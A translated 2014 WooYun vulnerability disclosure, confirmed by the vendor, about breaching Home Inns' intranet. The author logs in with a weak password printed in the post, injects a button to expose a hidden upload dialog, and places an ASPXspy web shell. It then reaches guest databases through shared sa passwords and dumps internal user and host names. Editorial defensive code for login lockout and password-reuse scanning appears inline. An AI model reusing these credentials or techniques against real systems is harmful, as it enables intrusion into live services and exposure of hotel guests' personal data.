See how I got into the Home Inns (如家) intranet (did you check into a hotel room today?)

Vulnerability details

Disclosure status:

2014-02-21: Details sent to the vendor, awaiting the vendor's handling
2014-02-21: Vendor has confirmed; details disclosed to the vendor only
2014-03-03: Details disclosed to core white hats and experts in the relevant field
2014-03-13: Details disclosed to ordinary white hats
2014-03-23: Details disclosed to intern white hats
2014-04-07: Details disclosed to the public

Brief description:

I have always felt that titles like "See how I..." are a bit too cocky, so today I deliberately picked one to try and see what it feels like.
So far I have looked at more than 20 database servers. Did you check into a hotel today? You did? Then it can definitely be looked up. All kinds of user information... there even seems to be a place where room prices can be changed? ... In short, all sorts of things in the databases.

Detailed description:

The root cause is http://office.homeinns.com/hcs/. All kinds of weak passwords that let you log in without an ikey, and no brute-force protection whatsoever, not even a captcha...
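The two controls the hcs login page is described as lacking are a password policy and a limit on failed attempts. The block below is an added example written for this page, not code from the original report or from the vendor's system: a weak-password check plus a per-account lockout with a sliding window, as plain server-side functions. MAX_FAILS, WINDOW_MS, the role of `verify()` and the sample account are assumptions made for the example.

```javascript
// Added example (not from the original report or the vendor's system): a weak-password
// policy and a failed-attempt lockout for a login page. MAX_FAILS, WINDOW_MS and the
// sample account below are assumptions made for this example.

const MAX_FAILS = 5;                 // failed attempts allowed per account per window
const WINDOW_MS = 15 * 60 * 1000;    // 15-minute sliding window for counting failures

// Reject passwords derived from the username, short ones, a bare word plus a few digits,
// and a handful of common words. (A real deployment would also check a breached-password list.)
function isWeakPassword(username, password) {
  const pw = password.toLowerCase();
  const user = username.toLowerCase();
  if (pw.length < 10) return true;
  if (user.length >= 3 && pw.includes(user)) return true;   // e.g. "jdoe123" for user "jdoe"
  if (/^[a-z]+\d{1,4}$/.test(pw)) return true;              // word plus a short digit suffix
  return ['password', '123456', 'qwerty', 'admin'].some(w => pw.includes(w));
}

class LoginGuard {
  // verify(username, password) is the application's real credential check.
  // now() is injectable so the lockout window can be exercised without waiting.
  constructor(verify, now = () => Date.now()) {
    this.verify = verify;
    this.now = now;
    this.fails = new Map();   // username -> timestamps of recent failures
  }

  recentFailures(username) {
    const cutoff = this.now() - WINDOW_MS;
    const recent = (this.fails.get(username) || []).filter(t => t > cutoff);
    this.fails.set(username, recent);
    return recent;
  }

  isLocked(username) {
    return this.recentFailures(username).length >= MAX_FAILS;
  }

  // Returns a reason rather than a bare boolean so the caller can log lockouts.
  attempt(username, password) {
    if (this.isLocked(username)) return { ok: false, reason: 'locked' };
    if (this.verify(username, password)) {
      this.fails.delete(username);
      return { ok: true, reason: 'ok' };
    }
    this.recentFailures(username).push(this.now());
    return { ok: false, reason: 'bad-credentials' };
  }
}

// Walk through a guessing run against one constructed account and return what happened.
function demo() {
  let clock = 0;
  const accounts = { jdoe: 'correct-horse-battery-staple-42' };   // constructed sample account
  const guard = new LoginGuard((u, p) => accounts[u] === p, () => clock);
  const reasons = [];
  for (let i = 0; i < 6; i++) reasons.push(guard.attempt('jdoe', 'guess' + i).reason);
  reasons.push(guard.attempt('jdoe', accounts.jdoe).reason);   // right password, still locked
  clock += WINDOW_MS + 1;                                       // the window expires
  reasons.push(guard.attempt('jdoe', accounts.jdoe).reason);
  return reasons;
}

console.log(demo());
```

The lockout is keyed on the account rather than the source address, because a guessing run spread across many addresses still lands on the same account; a production version would additionally rate-limit per address and record each lockout for the SOC.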

First, the hcs system.

The weak password zuods/zuods123 gets you straight in (is this an executive?)

image006.png

All kinds of sales staff?

image008.png

Open http://office.homeinns.com/hcs/Configure/Filesmanage.aspx

image010.png

Originally there is no file upload to be seen here. Fine, then:

Let's look at the source first:

function UpTo()
{
    // pop up the upload dialog
    $('#Upinfo').dialog({ autoOpen: false, modal: true, resizable: false, draggable: true, title: '文件上传', dialogClass: "login_dialog" });
    $('#ctl00_ContentPlaceHolder1_btnUpload').click(function () {
        $("#Upinfo").load('../Configure/UpFileLoad1.html').dialog('option', { 'width': 600, 'height': 250, 'title': '文件上传' }).dialog('open');
        return false;
    });
}

Oh, so there is a file upload dialog? How do we bring it up?

Find a suitable spot and add the following code:

<input type="button" id="ctl00_ContentPlaceHolder1_btnUpload" value="Click" onclick="UpTo()" />

image012.png

After clicking it, the upload dialog appears:

image013.png

Upload one!

image015.png

The download section shows the path directly:

http://office.homeinns.com/Hcs/uploadfiles/ASPXspy2.aspx

园长 recently modified this thing... the 2014 edition, stay tuned!

image017.png

All kinds of "internal files"???

image019.png

image021.png

Intranet IPs.

Multiple MSSQL sa passwords leaked

image022.png

image024.png

Proof of vulnerability:

Let's look at the intranet. Some information below has been masked where appropriate.

Domain users:
\\021rjsh0070s.home.cn 的用户帐户

-------------------------------------------------------------------------------
2050 2051 2052
2053 2054 2055
2056 2057 2058
2059 2060 2061
2062 2063 2064
2065 2066 2067
2068 2069 2070
2071 2072 2073
2074 2075 2076
2077 2078 2079
2080 2081 2082
2083 2084 2085
2086 2087 2088
2089 2090 2091
2092 3001 3002
3003 3004 3006
3007 3008 3009
3010 3011 3012
3013 3014 3015
3016 3017 3018
4001 4002 4003
4005 4006 4007
4008 4009 4010
4011 4012 4013
7001 7002 7003
7004 7005 8001
8002 8003 8004
8008 8009 8010
8011 alzhao Appadmin
aqsun aschen autocad
aychen bbding bbsun
………………………………
………………
ztzhong zxchen zxie
zxqiu zxwang zychai
zydeng zydong zyhu
zywei zyxie zyyin
zyzhang zzzuo 茅燕华
命令成功完成。

Server Name Remark
-------------------------------------------------------------------------------
\\021KAIFATEST
\\021RISH-148WRK
\\021RJ17443W
\\021RJSH-015WRK
\\021RJSH-108WRK
\\021RJSH-109WRK
\\021RJSH-110WRK
\\021RJSH-111WRK
\\021RJSH-112WRK
\\021RJSH-113WRK
\\021RJSH-114WRK
\\021RJSH-118WRK
\\021RJSH-119WRK
\\021RJSH-121WRK
\\021RJSH-125WRK
\\021RJSH-126WRK
\\021RJSH-129WRK
\\021RJSH-130WRK
\\021RJSH-132WRK
\\021RJSH-133WRK
…………
…………
\\021RJSH-135WRK
\\021RJSH-136WRK
\\021RJSH-137WRK
\\021RJSH-142WRK
\\021RJSH-144WRK
\\021RJSH-145WRK
\\021RJSH-147WRK
\\021RJSH-153WRK
\\021RJSH-154WRK
\\021RJSH-155WRK
\\021RJSH-156WRK
\\021RJSH-160WRK
\\021RJSH-162WRK
\\021RJSH-163WRK
\\021RJSH-166WRK
\\021RJSH-167WRK
\\021RJSH-168WRK
\\021RJSH-170WRK
\\021RJSH-172WRK
\\021RJSH-174WRK
\\021RJSH-177WRK
\\021RJSH-179WRK
\\021RJSH-182WRK
\\021RJSH-189WRK
\\021RJSH-191WRK
\\021RJSH-195WRK
\\021RJSH-197WRK
\\021RJSH-200WRK
\\021RJSH-202WRK
\\021RJSH-203WRK
\\021RJSH-204WRK
\\021RJSH-207WRK
\\021RJSH-208WRK
\\021RJSH-209W
\\021RJSH-209WRK
\\021RJSH-210WRK
\\021RJSH-213WRK
\\021RJSH-215WRK
\\021RJSH-216WRK
\\021RJSH-217WRK
\\021RJSH-221WRK
\\021RJSH-228WRK
\\021RJSH-229WRK
\\021RJSH-230WRK
\\021RJSH-231WRK
\\021RJSH-246WRK
\\021RJSH-56W
\\021RJSH-62WRK
\\021RJSH-72WRK
\\021RJSH-82WRK
\\021RJSH-91WRK
\\021RJSH00007S
\\021RJSH00014S
\\021RJSH00103S2
\\021RJSH00114S
\\021RJSH00135S
\\021RJSH00138S-2
\\021RJSH00139S
\\021RJSH00141S
\\021RJSH00146S
\\021RJSH00153S
\\021RJSH00154S
\\021RJSH00156S2
\\021RJSH00166S
\\021RJSH00166S2
\\021RJSH00167S
\\021RJSH00170S
\\021RJSH00176S
\\021RJSH00193S
\\021RJSH00196S2 021rjsh
\\021RJSH00197S2
\\021RJSH00198S
\\021RJSH00199S
\\021RJSH00200S
\\021RJSH00215S
\\021RJSH00216S
\\021RJSH00217S
\\021RJSH00218S
\\021RJSH00219S
\\021RJSH00221S
\\021RJSH00226S
\\021RJSH00230S
\\021RJSH00233S
\\021RJSH00242S
\\021RJSH00249S
\\021RJSH00250S
\\021RJSH00251S
\\021RJSH0026S
\\021RJSH0027S
\\021RJSH0029S2
\\021RJSH0030S2
\\021RJSH0031S
\\021RJSH0035S
\\021RJSH0037S
\\021RJSH0038S
\\021RJSH0039S
\\021RJSH0041S
\\021RJSH0045S
\\021RJSH0046S-1
\\021RJSH0047S
\\021RJSH0048S
\\021RJSH0049S
\\021RJSH0050S-1
\\021RJSH0051S
\\021RJSH0052S
\\021RJSH0054S2
\\021RJSH0055S
\\021RJSH0056S
\\021RJSH0058S
\\021RJSH0059S
\\021RJSH0061S
\\021RJSH0062S
\\021RJSH0063S
\\021RJSH0064S
\\021RJSH0068S2
\\021RJSH0070S
\\021RJSH0071S
\\021RJSH0072S-1
\\021RJSH0073S
\\021RJSH0074S
\\021RJSH0076S
\\021RJSH0077S
\\021RJSH0078S
\\021RJSH0081S
\\021RJSH0082S WSUS & NAV Update Server
\\021RJSH0083S
\\021RJSH0084S
\\021RJSH0085S2
\\021RJSH0086S
\\021RJSH0088S
\\021RJSH0089S
\\021RJSH0090S
\\021RJSH0091S
\\021RJSH0093S
……………………………………
………………………………
\\RUJIA-REC5
\\RYZHANG-PC
\\TESTSERVER
\\U5C9502
\\WWW-07A33BE82F1
\\XUNIJI001
\\XUNIJI002





First, the 192.168.210.* range:

image026.png

image027.png

image028.png

Anonymous FTP

image029.png

There are also more than 15 servers sharing the same sa password, so their databases can all be dumped at will! They contain a great deal of user data, such as users' real names, ID card numbers and passwords.
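Two findings above point at the same root cause: sa passwords sitting in "internal files" (the leaked MSSQL credentials), and one sa password shared by more than 15 servers. The block below is an added example for this page, not code from the original report: a small scanner that pulls MSSQL connection strings out of text taken from config files or documents, keeps only those using the sa login, and groups them by password so that reuse across servers stands out. It reports passwords only in masked form so that its own output does not become another leak. The sample text is constructed (RFC 5737 test addresses) and the function names are this example's own.

```javascript
// Added example (not from the original report): find MSSQL connection strings that use the
// "sa" login in config or document text and group them by password to expose reuse.
// SAMPLE below is constructed; function names are assumptions made for this example.

const START_RE = /(?:server|data source)\s*=/i;

// Parse "key=value;key=value" into a lower-cased key map.
function parseFields(s) {
  const fields = {};
  for (const part of s.split(';')) {
    const i = part.indexOf('=');
    if (i < 0) continue;
    fields[part.slice(0, i).trim().toLowerCase()] = part.slice(i + 1).trim();
  }
  return fields;
}

// Extract one connection string from a line, stopping at a quote or tag so that
// web.config style lines (connectionString="Server=...") parse cleanly.
function extractConnectionString(line) {
  const m = START_RE.exec(line);
  if (!m) return null;
  let rest = line.slice(m.index);
  const end = rest.search(/["'<]/);
  if (end >= 0) rest = rest.slice(0, end);
  const f = parseFields(rest);
  const server = f['server'] || f['data source'];
  const login = f['user id'] || f['uid'];
  const password = f['password'] !== undefined ? f['password'] : f['pwd'];
  return server && login && password !== undefined ? { server, login, password } : null;
}

function findConnectionStrings(text) {
  return text.split(/\r?\n/).map(extractConnectionString).filter(Boolean);
}

// Show only the first and last character of a password in reports.
function mask(pw) {
  return pw.length <= 2 ? '*'.repeat(pw.length) : pw[0] + '*'.repeat(pw.length - 2) + pw[pw.length - 1];
}

// sa logins only, grouped by password; groups used on a single server are dropped,
// so what remains is exactly the reuse a defender needs to rotate first.
function saPasswordReuse(text) {
  const groups = new Map();   // password -> Set of servers
  for (const c of findConnectionStrings(text)) {
    if (c.login.toLowerCase() !== 'sa') continue;
    if (!groups.has(c.password)) groups.set(c.password, new Set());
    groups.get(c.password).add(c.server);
  }
  return [...groups.entries()]
    .map(([pw, servers]) => ({ masked: mask(pw), servers: [...servers].sort() }))
    .filter(g => g.servers.length > 1)
    .sort((a, b) => b.servers.length - a.servers.length);
}

// Constructed sample: three apps sharing one sa password, one read-only login, one unique sa.
const SAMPLE = [
  '<add name="Hotel" connectionString="Server=192.0.2.10;Database=Hotel;User Id=sa;Password=Example#1;" />',
  '<add name="Member" connectionString="Data Source=192.0.2.11;Initial Catalog=Member;uid=sa;pwd=Example#1" />',
  '# ops notes: report server',
  'Server=192.0.2.12;Database=Report;User Id=sa;Password=Example#1;',
  'Server=192.0.2.13;Database=Audit;User Id=audit_ro;Password=Other!2;',
  'Server=192.0.2.14;Database=Test;User Id=sa;Password=Unique#9;',
].join('\n');

console.log(saPasswordReuse(SAMPLE));
```

Run over an export of the internal file share, the output is a short list of masked passwords with the servers behind each; every entry on it is a single credential whose compromise opens several databases at once, which is the situation described in this report.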

image030.png

image031.png

Let's look at the data on the database servers.

192.168.210.35, user data; too sensitive, so I won't screenshot much of it to avoid leaking information. The rest below is likewise kept to a minimum to avoid enlarging the harm.

image032.png

image034.png

image035.png

192.168.210.38: can I change room prices?

image037.png

192.168.210.72

image039.png

192.168.210.65

image040.png

192.168.210.72

image041.png

192.168.210.251

image043.png

The 172.23.100.* range:

image045.png

Multiple sa passwords:

image046.png

172.23.100.21:

image047.png

image049.png

172.23.100.109

image051.png

image053.png

Can be worked directly as System:

image055.png

I won't go any further with this. Other IPs actually have similar problems, and I didn't bother with them either.

Fix recommendations:

Many kinds of issues... do a comprehensive analysis and work out how to fix them.

Also, WooYun @疯狗 @xsser, could I get a 雷 (lightning bolt)? It has been a long time since I was struck by one.

Copyright notice: when reposting, please credit the source wefgod@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed at: 2014-02-21 11:52

Vendor reply:

Thanks for the attention!!!

Latest status:

None yet


Vulnerability rating: